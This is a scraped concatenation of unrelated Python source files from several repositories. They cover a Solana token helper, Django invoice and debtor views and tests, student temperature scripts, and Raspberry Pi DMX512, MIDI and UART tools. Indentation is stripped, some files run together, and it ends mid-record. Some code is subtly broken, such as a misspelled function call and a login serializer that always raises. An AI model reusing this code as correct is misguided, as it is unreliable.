# The `TokenValue` class is a simple way of keeping a token and value together, and
# displaying them nicely consistently.
#
class TokenValue:
def __init__(self, token: Token, value: Decimal):
self.logger: logging.Logger = logging.getLogger(self.__class__.__name__)
self.token = token
self.value = value
def shift_to_native(self) -> "TokenValue":
new_value = self.token.shift_to_native(self.value)
return TokenValue(self.token, new_value)
@staticmethod
def fetch_total_value_or_none(context: Context, account_public_key: PublicKey, token: Token) -> typing.Optional["TokenValue"]:
opts = TokenAccountOpts(mint=token.mint)
token_accounts = context.client.get_token_accounts_by_owner(account_public_key, opts)
if len(token_accounts) == 0:
return None
total_value = Decimal(0)
for token_account in token_accounts:
token_balance: Decimal = context.client.get_token_account_balance(token_account["pubkey"])
total_value += token_balance
return TokenValue(token, total_value)
@staticmethod
def fetch_total_value(context: Context, account_public_key: PublicKey, token: Token) -> "TokenValue":
value = TokenValue.fetch_total_value_or_none(context, account_public_key, token)
if value is None:
return TokenValue(token, Decimal(0))
return value
@staticmethod
def report(values: typing.Sequence["TokenValue"], reporter: typing.Callable[[str], None] = print) -> None:
for value in values:
reporter(f"{value.value:>18,.8f} {value.token.name}")
@staticmethod
def find_by_symbol(values: typing.Sequence[typing.Optional["TokenValue"]], symbol: str) -> "TokenValue":
found = [
value for value in values if value is not None and value.token is not None and value.token.symbol_matches(symbol)]
if len(found) == 0:
raise Exception(f"Token '{symbol}' not found in token values: {values}")
if len(found) > 1:
raise Exception(f"Token '{symbol}' matched multiple tokens in values: {values}")
return found[0]
@staticmethod
def find_by_mint(values: typing.Sequence[typing.Optional["TokenValue"]], mint: PublicKey) -> "TokenValue":
found = [value for value in values if value is not None and value.token is not None and value.token.mint == mint]
if len(found) == 0:
raise Exception(f"Token '{mint}' not found in token values: {values}")
if len(found) > 1:
raise Exception(f"Token '{mint}' matched multiple tokens in values: {values}")
return found[0]
@staticmethod
def find_by_token(values: typing.Sequence[typing.Optional["TokenValue"]], token: Token) -> "TokenValue":
return TokenValue.find_by_mint(values, token.mint)
@staticmethod
def changes(before: typing.Sequence["TokenValue"], after: typing.Sequence["TokenValue"]) -> typing.Sequence["TokenValue"]:
changes: typing.List[TokenValue] = []
for before_balance in before:
after_balance = TokenValue.find_by_token(after, before_balance.token)
result = TokenValue(before_balance.token, after_balance.value - before_balance.value)
changes += [result]
return changes
def __add__(self, token_value_to_add: "TokenValue") -> "TokenValue":
if self.token != token_value_to_add.token:
raise Exception(
f"Cannot add TokenValues from different tokens ({self.token} and {token_value_to_add.token}).")
return TokenValue(self.token, self.value + token_value_to_add.value)
def __sub__(self, token_value_to_subtract: "TokenValue") -> "TokenValue":
if self.token != token_value_to_subtract.token:
raise Exception(
f"Cannot subtract TokenValues from different tokens ({self.token} and {token_value_to_subtract.token}).")
return TokenValue(self.token, self.value - token_value_to_subtract.value)
def __eq__(self, other: typing.Any) -> bool:
if isinstance(other, TokenValue) and self.token == other.token and self.value == other.value:
return True
return False
def __str__(self) -> str:
name = "« 𝚄𝚗-𝙽𝚊𝚖𝚎𝚍 𝚃𝚘𝚔𝚎𝚗 »"
if self.token and self.token.name:
name = self.token.name
return f"« 𝚃𝚘𝚔𝚎𝚗𝚅𝚊𝚕𝚞𝚎: {self.value:>18,.8f} {name} »"
def __repr__(self) -> str:
return f"{self}"
``` |
{
"source": "jimmyjones2/community",
"score": 3
} |
#### File: community/pa-to-es/result_parser.py
```python
import json
class ResultParser():
''' Construct with the text response from calling performance analyzer. Use
the records() method to iterate over the response, retrieving a single
Elasticsearch doc with each call. '''
def __init__(self, metric, response_text):
'''response_text is the body of the response to the GET request.'''
self.response_json = json.loads(response_text)
self.metric = metric
def _unpack_record(self, fields, record):
''' Match the field names with their values in the record. If there's no
applicable value for the field (it's "null"), don't add the field to
the doc. Returns a dict, which is the basis for the doc.'''
ret = {'metric': self.metric.name}
for field_name, value in zip(fields, record):
if value is None or value == 'null':
continue
ret[field_name] = value
return ret
def records(self):
''' Iterates the response, yielding one dict at a time with a single
metric and dimension
A word on the API. PA returns a record for each combination
of the requested dimensions. If a dimension doesn't bear on that
particular metric, PA returns the string "null". To create the
ES doc, you want to expose the combinations of dimensions that
have values for that metric, skipping dimensions that have
"null". The null dimensions are stripped out in _unpack_record. '''
for node_name, values in self.response_json.items():
timestamp = values['timestamp']
data = values['data']
if not data:
break
field_names = [x['name'] for x in data['fields']]
records = data['records']
for record in records:
doc = self._unpack_record(field_names, record)
if not doc:
continue
doc['node_name'] = node_name
doc['@timestamp'] = timestamp
doc['agg'] = self.metric.agg
yield doc
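if __name__ == '__main__':
    # Illustrative sketch (not part of the original file): run the parser on a
    # hand-made payload. The metric object and response below are hypothetical and
    # only mirror the fields the parser reads (name, agg, fields, records).
    from collections import namedtuple

    FakeMetric = namedtuple('FakeMetric', ['name', 'agg'])
    fake_response = json.dumps({
        "node1": {
            "timestamp": 1600000000000,
            "data": {
                "fields": [{"name": "ShardID"}, {"name": "CPU_Utilization"}],
                "records": [["shard-0", 0.42], ["shard-1", 0.13]],
            },
        }
    })
    parser = ResultParser(FakeMetric(name="CPU_Utilization", agg="avg"), fake_response)
    for doc in parser.records():
        print(doc)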
``` |
{
"source": "Jimmyjtc001/assignment1",
"score": 3
} |
#### File: Jimmyjtc001/assignment1/a1_t1_3.py
```python
def f_to_c(f):
    # This formula is (f-32)*5/9
    # I took this formula from this link: //contractor quote
    c = (f - 32) * 5 / 9
    return c
f = 60
c = f_to_c(f)
print("Fahrenheit " + str(f) + " is " + str(c) + " in Celsius")
```
#### File: Jimmyjtc001/assignment1/a1_t1_4.py
```python
def f_to_k(f):
    # Formula = (f-32)*5/9+273.15
    # I took this formula from this link: http://contractor quote
    k = (f - 32) * 5 / 9 + 273.15
    return k
f = 60
k = f_to_k(f)
print("Fahrenheit " + str(f) + " is " + str(k) + " in Kelvin")
``` |
{
"source": "Jimmyjtc001/assignment2",
"score": 4
} |
#### File: Jimmyjtc001/assignment2/main.py
```python
import os
from library.temperature import c_to_f
def get_command_input():
print("Indoor Air Quality Monitoring Command Console\n")
print("Please select from the following options:")
print("(A) Add reading")
print("(B) List readings")
print("(C) Calculate")
print("(D) Exit\n")
command = input("Input: ")
os.system("clear")
return command
def get_readings():
print("Please input")
temperature = input("Temperature (degrees): ")
humidity = input("Humidity (%): ")
readings = {
"temperature": temperature,
"humidity": humidity
}
os.system("clear")
print("* * * * * * * * * * * * * *")
print("Successfully saved reading")
print("* * * * * * * * * * * * * *")
print("\nHit enter key to return to the menu")
input()
os.system("clear")
return readings
def main():
# This variable controls the main runtime loop
# of our application. If this variable is False
    # then our application should terminate.
main_loop_is_running = True
readings = []
while main_loop_is_running:
command = get_command_input()
if command == "A":
data_reading = get_readings()
readings.append(data_reading)
elif command == "B":
print("TODO: List readings GUI page")
elif command == "C":
print("TODO: Calculate")
elif command in ["D", "d", "(D)", "(d)"]:
main_loop_is_running = False
if __name__ == "__main__":
main()
import os
import statistics
TEMPERATURE_ID = 1
HUMIDITY_ID = 2
PRESSURE_ID = 3
class TimeSeriesDatum:
id = 0 # 1=TEMP, 2=HUMID, 3=PRESS, etc.
value = 0
time = 0
def __init__(self, id, value, time):
self.id = id
self.value = value
self.time = time
class Instrument:
# Member variables
data = []
def get_values_by_id(self, id):
values = []
for datum in self.data:
if datum.id == id:
values.append(datum.value)
return values
def get_mean_by_id(self, id):
values = self.get_values_by_id(id)
mean = statistics.mean(values)
return mean
def get_median_by_id(self, id):
values = self.get_values_by_id(id)
median = statistics.median(values)
return median
def print_calculation_by_id(self, id):
if id == TEMPERATURE_ID:
print("Temperature")
if id == HUMIDITY_ID:
print("Humidity")
mean = self.get_mean_by_id(id)
median = self.get_median_by_id(id)
print("Mean:", mean)
print("Median:", median)
print("\n")
def add_datum(self, id, value, time):
datum = TimeSeriesDatum(id, value, time)
self.data.append(datum)
tool = Instrument()
tool.add_datum(TEMPERATURE_ID, 25, 1)
tool.add_datum(TEMPERATURE_ID, 26, 2)
tool.add_datum(TEMPERATURE_ID, 29, 3)
tool.add_datum(HUMIDITY_ID, 80, 1)
tool.add_datum(HUMIDITY_ID, 75, 2)
tool.add_datum(HUMIDITY_ID, 50, 3)
tool.print_calculation_by_id(TEMPERATURE_ID)
tool.print_calculation_by_id(HUMIDITY_ID)
def get_command():
print("Indoor Air Quality Monitoring Command Console")
print("Please select from the following options:")
print("1 - Add reading")
print("2 - List readings")
print("3 - Calculate")
print("4 - Exit")
command = int(input("Choose option: "))
os.system("clear")
return command
is_running = True
while is_running:
    command = get_command()
if command == 1:
print("add")
if command == 2:
print("list")
if command == 3:
print("calc")
if command == 4:
is_running = False
``` |
{
"source": "Jimmyjtc001/indoorair-webapp-a",
"score": 2
} |
#### File: indoorair/profilebyjimmy/views.py
```python
from django.shortcuts import render
from django.http import JsonResponse
def retrieve_profile_page(request):
return render(request, "profilebyjimmy/retrieve.html",{},)
def update_profile_page(request):
return render(request, "profilebyjimmy/update.html",{},)
def update_profile_api(request):
return JsonResponse({
})
def retrieve_profile_api(request):
return JsonResponse({
})
``` |
{
"source": "Jimmyjtc001/indoorair-webapp-b",
"score": 2
} |
#### File: indoorair/gateway/serializers.py
```python
from rest_framework import serializers
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from rest_framework.validators import UniqueValidator
class RegisterSerializer(serializers.Serializer):
first_name = serializers.CharField()
last_name = serializers.CharField(required = False)
email = serializers.EmailField(
validators=[
UniqueValidator(queryset=User.objects.all())
]
)
username = serializers.CharField(
validators=[
UniqueValidator(queryset=User.objects.all())
]
)
password = serializers.CharField(write_only = True)
def create(self, validated_data):
first_name = validated_data.get('first_name')
last_name = validated_data.get('last_name', None)
email = validated_data.get('email')
username = validated_data.get('username')
        password = validated_data.get('password')
user = User.objects.create_user(username, email, password)
user.last_name = last_name
user.first_name = first_name
user.save()
return user
class LoginSerializer(serializers.Serializer):
username = serializers.CharField()
password = serializers.CharField()
def create(self, validated_data):
username = validated_data.get('username', None)
password = validated_data.get('password', None)
        request = self.context.get('request')
try:
user = authenticate(username=username, password=password)
if user:
login(request, user)
return user
except Exception as e:
print(e)
        raise serializers.ValidationError('Please enter a valid username and password')
``` |
{
"source": "jimmykamau/2048-AI",
"score": 2
} |
#### File: jimmykamau/2048-AI/PlayerAI_3.py
```python
from random import randint
from BaseAI_3 import BaseAI
class PlayerAI(BaseAI):
def getMove(self, grid):
moves = grid.getAvailableMoves()
return moves[1] if moves else None
``` |
{
"source": "jimmykamau/couscous",
"score": 2
} |
#### File: v1/debtor/admin.py
```python
from django.contrib import admin
from .models import Debtor
class DebtorAdmin(admin.ModelAdmin):
exclude = ['created_by']
list_display = (
'email', 'open_invoices', 'paid_invoices',
'overdue_invoices'
)
def get_queryset(self, request):
qs = super().get_queryset(request)
if request.user.is_superuser:
return qs
return qs.filter(created_by=request.user)
def save_model(self, request, obj, form, change):
obj.created_by = request.user
super().save_model(request, obj, form, change)
def has_change_permission(self, request, obj=None):
if not obj:
return True
if obj.created_by == request.user:
return True
return False
def open_invoices(self, obj):
return obj.open_invoices
def paid_invoices(self, obj):
return obj.paid_invoices
def overdue_invoices(self, obj):
return obj.overdue_invoices
has_delete_permission = has_change_permission
admin.site.register(Debtor, DebtorAdmin)
```
#### File: debtor/tests/test_views.py
```python
import random
from django.urls import reverse
from rest_framework.test import APITestCase
import couscous.v1.invoice.tests.factories as invoice_factories
import couscous.v1.tests.factories as couscous_factories
from couscous.v1.debtor import logger
from .factories import DebtorFactory
class ListDebtorViewTests(APITestCase):
def setUp(self):
self.admin_user = couscous_factories.UserFactory()
self.client.force_authenticate(user=self.admin_user)
self.debtors = DebtorFactory.create_batch(3, created_by=self.admin_user)
self.invoices = invoice_factories.InvoiceFactory.create_batch(
3, debtor=self.debtors[1]
)
self.url = reverse('v1:list-debtors')
def tearDown(self):
self.client.force_authenticate(user=None)
def test_cannot_list_without_staff_rights(self):
self.admin_user.is_staff = False
self.admin_user.save()
response = self.client.get(
self.url, format='json'
)
self.assertEqual(403, response.status_code)
def test_list_debtors(self):
response = self.client.get(
self.url, format='json'
)
self.assertEqual(200, response.status_code)
self.assertEqual(
len(self.debtors),
len(response.data)
)
self.assertCountEqual(
[
'email', 'iban', 'open_invoices',
'paid_invoices', 'overdue_invoices'
],
response.data[0]
)
def test_cannot_view_other_user_debtors(self):
other_admin = couscous_factories.UserFactory()
self.client.force_authenticate(user=other_admin)
response = self.client.get(
self.url, format='json'
)
self.assertEqual(200, response.status_code)
self.assertFalse(response.data)
def test_filter_results(self):
# Filter by invoice status
status = random.choice(
[
("OP", "open_invoices"),
("PA", "paid_invoices"),
("OV", "overdue_invoices")
]
)
url = f"{self.url}?status={status[0]}"
response = self.client.get(url, format='json')
self.assertEqual(200, response.status_code)
for debtor in response.data:
self.assertLess(
0,
debtor[status[1]]
)
# Filter by invoice count
other_invoices = invoice_factories.InvoiceFactory.create_batch(
2, debtor=self.debtors[0]
)
url = f"{self.url}?invoice_count={len(other_invoices)}"
response = self.client.get(url, format='json')
self.assertEqual(200, response.status_code)
random_result = random.choice(response.data)
self.assertEqual(other_invoices[0].debtor.email, random_result['email'])
```
#### File: invoice/tests/test_views.py
```python
from django.urls import reverse
from rest_framework.test import APITestCase
import couscous.v1.debtor.tests.factories as debtor_factories
import couscous.v1.tests.factories as couscous_factories
from couscous.v1.invoice import logger
from .factories import InvoiceFactory
class ListInvoiceViewTests(APITestCase):
def setUp(self):
self.admin_user = couscous_factories.UserFactory()
self.client.force_authenticate(user=self.admin_user)
self.debtors = debtor_factories.DebtorFactory.create_batch(
3, created_by=self.admin_user
)
self.invoices = InvoiceFactory.create_batch(
5, debtor=self.debtors[0]
)
self.url = reverse('v1:list-invoices')
def tearDown(self):
self.client.force_authenticate(user=None)
def test_list_invoices(self):
response = self.client.get(
self.url, format='json'
)
self.assertEqual(200, response.status_code)
self.assertEqual(
len(self.invoices),
len(response.data)
)
# Check the content of the returned data
self.assertCountEqual(
['email', 'status', 'amount', 'due_date'],
response.data[0]
)
def test_cannot_list_invoices_without_auth(self):
# Test for user that didn't create invoices
other_user = couscous_factories.UserFactory()
self.client.force_authenticate(user=other_user)
response = self.client.get(
self.url, format='json'
)
self.assertEqual(200, response.status_code)
self.assertFalse(response.data)
# Test for user without staff rights
self.admin_user.is_staff = False
self.admin_user.save()
self.client.force_authenticate(user=self.admin_user)
response = self.client.get(
self.url, format='json'
)
self.assertEqual(403, response.status_code)
# Test for logged out user
self.client.force_authenticate(user=None)
response = self.client.get(
self.url, format='json'
)
self.assertEqual(403, response.status_code)
def test_filter_results(self):
other_debtor_invoices = InvoiceFactory.create_batch(2, debtor=self.debtors[1])
# Filter by debtor email
url = f"{self.url}?debtor__email={self.debtors[1].email}"
response = self.client.get(
url, format='json'
)
self.assertEqual(
200, response.status_code
)
self.assertEqual(
len(other_debtor_invoices),
len(response.data)
)
# Filter by status
status = other_debtor_invoices[0].status
url = f"{self.url}?status={status}"
response = self.client.get(
url, format='json'
)
self.assertEqual(200, response.status_code)
for invoice in response.data:
self.assertEqual(status, invoice['status'])
# Filter by amount
amount = float(other_debtor_invoices[1].amount)
url = f"{self.url}?amount={amount}"
response = self.client.get(
url, format='json'
)
self.assertEqual(200, response.status_code)
for invoice in response.data:
self.assertEqual(amount, float(invoice['amount']))
# Filter by due date
due_date = self.invoices[2].due_date.strftime('%Y-%m-%d')
url = f"{self.url}?due_date={due_date}"
response = self.client.get(
url, format='json'
)
self.assertEqual(200, response.status_code)
for invoice in response.data:
self.assertEqual(due_date, invoice['due_date'])
def test_order_results(self):
other_debtor_invoices = InvoiceFactory.create_batch(2, debtor=self.debtors[1])
self.url = f"{self.url}?ordering="
        # Order by ascending debtor email
response = self.client.get(
f"{self.url}debtor__email", format='json'
)
self.assertEqual(200, response.status_code)
self.assertGreater(
response.data[-1]['email'], response.data[0]['email']
)
        # Order by descending debtor email
response = self.client.get(
f"{self.url}-debtor__email", format='json'
)
self.assertEqual(200, response.status_code)
self.assertLess(
response.data[-1]['email'], response.data[0]['email']
)
        # Order by ascending status
response = self.client.get(
f"{self.url}status", format='json'
)
self.assertEqual(200, response.status_code)
self.assertGreater(
response.data[-1]['status'], response.data[0]['status']
)
        # Order by descending status
response = self.client.get(
f"{self.url}-status", format='json'
)
self.assertEqual(200, response.status_code)
self.assertLess(
response.data[-1]['status'], response.data[0]['status']
)
        # Order by ascending amount
response = self.client.get(
f"{self.url}amount", format='json'
)
self.assertEqual(200, response.status_code)
self.assertGreater(
response.data[-1]['amount'], response.data[0]['amount']
)
        # Order by descending amount
response = self.client.get(
f"{self.url}-amount", format='json'
)
self.assertEqual(200, response.status_code)
self.assertLess(
response.data[-1]['amount'], response.data[0]['amount']
)
        # Order by ascending due date
response = self.client.get(
f"{self.url}due_date", format='json'
)
self.assertEqual(200, response.status_code)
self.assertGreater(
response.data[-1]['due_date'], response.data[0]['due_date']
)
        # Order by descending due date
response = self.client.get(
f"{self.url}-due_date", format='json'
)
self.assertEqual(200, response.status_code)
self.assertLess(
response.data[-1]['due_date'], response.data[0]['due_date']
)
```
#### File: v1/invoice/views.py
```python
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters, generics, permissions
import couscous.v1.invoice.models as invoice_models
import couscous.v1.invoice.serializers as invoice_serializers
class ListInvoiceView(generics.ListAPIView):
"""
List Invoices
"""
permission_classes = (permissions.IsAdminUser,)
serializer_class = invoice_serializers.InvoiceSerializer
queryset = invoice_models.Invoice.objects.all()
filter_backends = (DjangoFilterBackend, filters.OrderingFilter)
filter_fields = ('debtor__email', 'status', 'amount', 'due_date')
ordering_fields = ['debtor__email', 'status', 'amount', 'due_date']
def get_queryset(self):
return self.queryset.filter(debtor__created_by=self.request.user)
``` |
{
"source": "JimmyKenMerchant/Python_Codes",
"score": 3
} |
#### File: Python_Codes/dmx512/dmx512.py
```python
import RPi.GPIO as gpio
import threading
class DMX512:
"""Dependency:RPi.GPIO, threading"""
def __init__(self, list_gpio_output, num_gpio_busy_toggle, num_gpio_eop_toggle):
self.list_gpio_output = list_gpio_output
self.num_gpio_busy_toggle = num_gpio_busy_toggle
self.num_gpio_eop_toggle = num_gpio_eop_toggle
gpio.setmode(gpio.BCM)
gpio.setup(self.list_gpio_output, gpio.OUT)
gpio.output(self.list_gpio_output, 0)
gpio.setup(self.num_gpio_busy_toggle, gpio.IN, pull_up_down=gpio.PUD_DOWN)
#gpio.add_event_detect(num_gpio_busy_toggle, gpio.BOTH)
gpio.setup(self.num_gpio_eop_toggle, gpio.IN, pull_up_down=gpio.PUD_DOWN)
#gpio.add_event_detect(num_gpio_eop_toggle, gpio.BOTH)
def transmitter(self, list_data, index, length, time_delay):
status_gpio_busy_toggle = gpio.input(self.num_gpio_busy_toggle)
length += index;
while index < length:
data = list_data[index]
list_bit = []
if data & 0b00001:
list_bit.append(self.list_gpio_output[1])
if data & 0b00010:
list_bit.append(self.list_gpio_output[2])
if data & 0b00100:
list_bit.append(self.list_gpio_output[3])
if data & 0b01000:
list_bit.append(self.list_gpio_output[4])
if data & 0b10000:
list_bit.append(self.list_gpio_output[5])
#print(list_bit)
gpio.output(self.list_gpio_output, 0)
gpio.output(self.list_gpio_output[0], 1) # High State of Clock
gpio.output(list_bit, 1)
dup_time_delay = time_delay
while dup_time_delay > 0:
dup_time_delay -= 1
gpio.output(self.list_gpio_output[0], 0) # Falling Edge of Clock
while True:
if status_gpio_busy_toggle != gpio.input(self.num_gpio_busy_toggle):
status_gpio_busy_toggle = gpio.input(self.num_gpio_busy_toggle)
index += 1
break
def start_tx(self, list_data, index, length, time_delay):
thread = threading.Thread(name='dmx512_start_tx', target=self.transmitter, args=(list_data, index, length, time_delay, ))
thread.setDaemon(True)
thread.start()
return thread
def eop_toggle(self):
return gpio.input(self.num_gpio_eop_toggle)
def __del__(self):
gpio.cleanup()
if __name__ == '__main__':
import sys
import time
import signal
version_info = "DMX512 Alpha"
def handle_sigint(signum, frame):
print(version_info + ": Force Stop")
sys.exit(0)
signal.signal(signal.SIGINT, handle_sigint)
argv = sys.argv
if len(argv) == 1:
time_delay = 4
else:
time_delay = float(argv[1])
print(sys.version)
# Call Class
dmx512 = DMX512([12,16,19,20,21,26], 6, 13)
# Initialization of Flushing Method
list_data = [0x1F, 0x14, 0x1B, 0x11, 0x00, 0x13]
thread1 = dmx512.start_tx(list_data, 0, 6, time_delay)
thread1.join()
# Set Initial Values and Start
list_data = [1] * 1026
thread1 = dmx512.start_tx(list_data, 0, 1026, time_delay)
thread1.join()
# Start DMX512 Transmission
list_data = [0x1D, 0x1A]
thread1 = dmx512.start_tx(list_data, 0, 2, time_delay)
thread1.join()
status_gpio_eop_toggle = dmx512.eop_toggle()
count = 2
while True:
list_data = [count] * 1026
thread1 = dmx512.start_tx(list_data, 0, 1026, time_delay)
thread1.join()
count += 1
if count > 0xF:
count = 0;
break
while True:
if status_gpio_eop_toggle != dmx512.eop_toggle():
status_gpio_eop_toggle = dmx512.eop_toggle()
break
#if gpio.event_detected(num_gpio_eop_toggle) == 1:
# break
```
#### File: Python_Codes/midi/midi2serial.py
```python
import sys
import argparse
import serial
import jack
import binascii
import signal
import time
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--serial", nargs=1, metavar="STRING", required=True,
help="port of serial interface")
parser.add_argument("-b", "--baudrate", nargs=1, metavar="INT", required=True,
help="baud rate", type=int)
parser.add_argument("-t", "--timeout", nargs=1, metavar="FLOAT", required=True,
help="read time out", type=float)
parser.add_argument("-p", "--pppenable",
help="flag of enabling pseudo polyphonic channel", action="store_true")
parser.add_argument("-n", "--pppnumber", nargs=1, metavar="INT",
help="number of monophonic devices for psuedo polyphonic channel", type=int)
parser.add_argument("-c", "--pppchannel", nargs=1, metavar="INT",
help="psuedo polyphonic MIDI channel", type=int)
parser.add_argument("-i", "--pppinvisible",
help="visible only polyphonic MIDI channel, and invisible monophonic devices from output devices", action="store_true")
parser.add_argument("-v", "--pppvoices", nargs=1, metavar="INT", default=[1],
help="number of voices in each monophonic devices, e.g., if the device has two voices, '-v 2'", type=int)
args= parser.parse_args()
#print(args)
#argv = sys.argv
__name = "JACK Audio Connection Kit to Serial Interface Bridge"
__version = "1.0.1"
version_info = __name + " " + __version
prompt = "\n**Press Enter to Quit**"
print (sys.version)
# Set MIDI Channel for Pseudo Polyphonic Function (PPP Channel)
# Set Number of Monophonic Devices for Pseudo Polyphonic Function
if args.pppenable is True:
ppp_midichannel = args.pppchannel[0] - 1
ppp_voices = args.pppvoices[0]
ppp_numberdevices = args.pppnumber[0] * ppp_voices # If multi voices in each monophonic devices
ppp_voices = ppp_voices - 1 # Use with logical shift right
# Make Table to Check Active/Inactive Monophonic Devices and Current Tone Number
ppp_devices = []
for i in range(0, ppp_numberdevices, 1):
ppp_devices.append(0x80) # MIDI Tone Number Is Up to 127 (0x7F)
else:
ppp_midichannel = None # None Type
ppp_numberdevices = None # None Type
# Set UART Connection
try:
uart = serial.Serial(port = args.serial[0], baudrate = args.baudrate[0], timeout = args.timeout[0])
except serial.SerialException as e:
print(version_info + ": Error on UART Settings")
sys.exit(1)
# Set MIDI Connection and Callback
midiclient = jack.Client("MIDI-TO-SERIAL")
midiport = midiclient.midi_inports.register("input")
@midiclient.set_process_callback
def process(frames):
for offset, data in midiport.incoming_midi_events():
data = binascii.hexlify(data) # Buffer Object (Binary) to String of Ascii Characters
bytes = [] # Empty List
for i in range(0, len(data) >> 1, 1): # If 3 bytes, len(data) will be 6. Divided By 2 through Logical Shift Right.
# data[start(inclusively):end(exclusively)], String to 8-bit Binary
start = i << 1 # 0,2,4,6... Multiplied By 2 through Logical Shift Left.
end = start + 2 # 2,4,6,8...
bytes.append(int(data[start:end], 16))
        bytes = pseudo_polyphonic(bytes)
if bytes == None: # If bytes is None because of ---pppinvisible flag
continue
#print(offset, end="\n")
#print(data, end="\n")
#print(bytes, end="\n")
for byte_int in bytes:
byte = byte_int.to_bytes(1, "little")
uart.write(byte)
#print(byte)
# This Function Assumes That Only One MIDI Message Is Captured by Client
def pseudo_polyphonic(bytes):
for count, byte_int in enumerate(bytes):
if byte_int >= 0x80: # If Status Byte
if ppp_midichannel is not None:
midichannel = byte_int & 0xF # Only Bit[3:0], 0 to 15
if ppp_midichannel == midichannel: # If Channel Is Matched with Psuedo Polyphonic Channel
midistatus = byte_int >> 4 # Only Bit[7:4], 8 to 15
if midistatus <= 8: # If Note Off
for i in range(0, ppp_numberdevices, 1): # If 3 bytes, len(data) will be 6. Divided By 2 through Logical Shift Right.
if ppp_devices[i] == bytes[count + 1]:
bytes[count] = (byte_int & 0xF0) + ((ppp_midichannel + (i >> ppp_voices) + 1) & 0xF)
ppp_devices[i] = 0x80
break # Break For Loop, Not If Syntax
return bytes
elif midistatus <= 9: # If Note On
for i in range(0, ppp_numberdevices, 1): # If 3 bytes, len(data) will be 6. Divided By 2 through Logical Shift Right.
if ppp_devices[i] >= 0x80:
bytes[count] = (byte_int & 0xF0) + ((ppp_midichannel + (i >> ppp_voices) + 1) & 0xF)
ppp_devices[i] = bytes[count + 1]
break # Break For Loop, Not If Syntax
return bytes
elif midistatus <= 10: # If Polyphonic Key Pressure
for i in range(0, ppp_numberdevices, 1): # If 3 bytes, len(data) will be 6. Divided By 2 through Logical Shift Right.
if ppp_devices[i] == bytes[count + 1]:
bytes[count] = (byte_int & 0xF0) + ((ppp_midichannel + (i >> ppp_voices) + 1) & 0xF)
break # Break For Loop, Not If Syntax
return bytes
else: # If Other Messages, Pitch Bend, etc.
#bytes_tuple = tuple(bytes) # Make Constant List from Dynamic List
newbytes = [] # New List
for i in range(0, ppp_numberdevices >> ppp_voices, 1):
for byte2 in bytes:
if byte2 >= 0x80: # If Status Byte
newbytes.append((byte2 & 0xF0) + ((ppp_midichannel + i + 1) & 0xF))
else: # If Data Byte
newbytes.append(byte2)
time.sleep(0.0002) # Wait for Time
return newbytes
else: # If not PPP Channel
if args.pppinvisible == True: # If PPP Invisible
bytes = None
return bytes
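# Worked example (illustrative, assuming the options -c 1 -n 2 -v 1): a Note On
# 0x90 0x3C 0x40 arriving on the pseudo-polyphonic channel 1 is rewritten to
# 0x91 0x3C 0x40 and claims the first free monophonic device; a second
# overlapping Note On is sent as 0x92 ...; the matching Note Off is routed back
# to whichever device currently holds that tone number, and channel-wide
# messages (pitch bend, etc.) are duplicated to every monophonic device.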
# Set Keyboard Interrupt
def handle_sigint(signum, frame):
print(version_info + ": Force Stop")
uart.close()
sys.exit(0)
signal.signal(signal.SIGINT, handle_sigint)
# Activate MIDI Client by "with" Syntax
#midiclient.activate()
#midiclient.deactivate()
#midiclient.close()
with midiclient:
print(version_info + prompt)
input()
uart.close()
```
#### File: uart/jimmyconsole/uart.py
```python
import sys
import serial
import time
char_star = "\x2A".encode("ascii", "replace") # Asterisk
char_lf = "\x0A".encode("ascii", "replace") # Line Feed
char_cr = "\x0D".encode("ascii", "replace") # Carriage Return
char_nak = "\x15".encode("ascii", "replace") # NAK
char_esc = "\x1B".encode("ascii", "replace") # Escape
char_sepa = "|".encode("ascii", "replace") # Separator
esc_up = "\x1B[A".encode("ascii", "replace") # Cursor Up on Escape Sequence
esc_down = "\x1B[B".encode("ascii", "replace") # Cursor Down on Escape Sequence
esc_right = "\x1B[C".encode("ascii", "replace") # Cursor Right on Escape Sequence
esc_left = "\x1B[D".encode("ascii", "replace") # Cursor Left on Escape Sequence
class UartConsole:
"""Dependency:time"""
def __init__(self, uart, file):
self.__uart = uart
self.file = file
def send(self, text, enmirror, enwrite):
for integer in text: # Integer
char = integer.to_bytes(1, "little")
self.receive(enmirror, enwrite)
flag = True
while flag == True:
if char == char_lf:
char = char_cr
self.__uart.write(char)
char_res = self.__uart.read(1) # Bytes
if char_res == char: # Receive Succeed
flag = False
if enwrite == True: # Write to File
self.write(char_res)
if enmirror == True: # External Mirror
char_res = chr(int.from_bytes(char_res, "little"))
print(char_res, end="", flush=True)
elif char_res == char_nak: # Receive Negative Acknowledge
time.sleep(0.001)
else: # Receive Fails
flag = False
def receive(self, enmirror, enwrite):
char = self.__uart.read(1)
while len(char) != 0:
if enwrite == True:
self.write(char)
if enmirror == True:
char = chr(int.from_bytes(char, "little"))
print(char, end="", flush=True)
char = self.__uart.read(1)
def receive_bytes(self, enmirror, enwrite):
char = self.__uart.read(1)
while len(char) != 0:
if enwrite == True:
self.write(char)
if enmirror == True:
print(char.hex(), flush=True)
char = self.__uart.read(1)
def write(self,char):
if self.file is not None:
if char == char_cr:
return
char = chr(int.from_bytes(char, "little"))
self.file.write(char)
def input(self):
while True:
self.receive(True, True)
try:
text_input = input()
except KeyboardInterrupt:
break
print("\x1B[A", end="", flush=True) # Cursor Up
text_input += "\r"
text_input = text_input.encode("ascii", "replace")
self.send(text_input, True, False)
def input_hex(self): # Write Typed Hexadecimal Value to UART
while True:
self.receive(True, True)
try:
text_input = input().split() # Make List Split By Space
except KeyboardInterrupt:
break
#print(text_input, flush=True)
for text in text_input: # Integer
#print(text, end="\n", flush=True)
integer = int(text, 16) # String to Integer with Hexadecimal
byte = integer.to_bytes(1, "little") # Integer Type to Binary
self.__uart.write(byte)
print(byte, end="\n", flush=True)
def __del__(self):
self.__uart.close()
if __name__ == '__main__':
print (sys.version)
argv = sys.argv
print (argv[0]) # File Name
fsrc = open( argv[1], "rb") # Read Only With Raw Data (Integer)
text_all = fsrc.read()
if len(argv) == 6: # If Sixth Argument Exists (File to Write)
fdst = open( argv[5], "w+") # Write Only With UTF-8
else:
fdst = None;
uart = serial.Serial(port = argv[2], baudrate = int(argv[3]), timeout = float(argv[4]))
uartconsole = UartConsole(uart, fdst)
uartconsole.send(text_all, True, False)
uartconsole.receive(True, True)
uartconsole.input()
uartconsole.receive(True, True)
del uartconsole
``` |
{
"source": "jimmykodes/neuron_blog_post",
